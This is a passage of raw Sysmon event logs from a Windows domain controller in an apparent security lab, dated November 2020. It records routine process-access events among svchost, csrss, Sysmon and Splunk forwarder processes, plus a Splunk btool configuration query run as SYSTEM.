EL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005469Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005468Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005467Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005466Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7CDE-5FA1-2001-000000008801}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005465Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005464Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7CDE-5FA1-1F01-000000008801}31084088C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7CDE-5FA1-2001-000000008801}4020C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005463Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.633{D28789B6-7CDE-5FA1-2001-000000008801}4020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7CDE-5FA1-1F01-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list kvstore --no-log 10341000x80000000000000005462Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDE-5FA1-1F01-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005461Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005460Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005459Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005458Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005457Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005456Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005455Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005454Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005453Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005452Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDE-5FA1-1F01-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005451Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.627{D28789B6-7CDE-5FA1-1E01-000000008801}39282492C:\Windows\system32\cmd.exe{D28789B6-7CDE-5FA1-1F01-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005450Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.628{D28789B6-7CDE-5FA1-1F01-000000008801}3108C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list kvstore --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{D28789B6-7CDE-5FA1-1E01-000000008801}3928C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list kvstore --no-log 10341000x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDE-5FA1-1E01-000000008801}3928C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005448Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005447Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005446Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005445Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005444Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005443Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:02.611{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005442Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 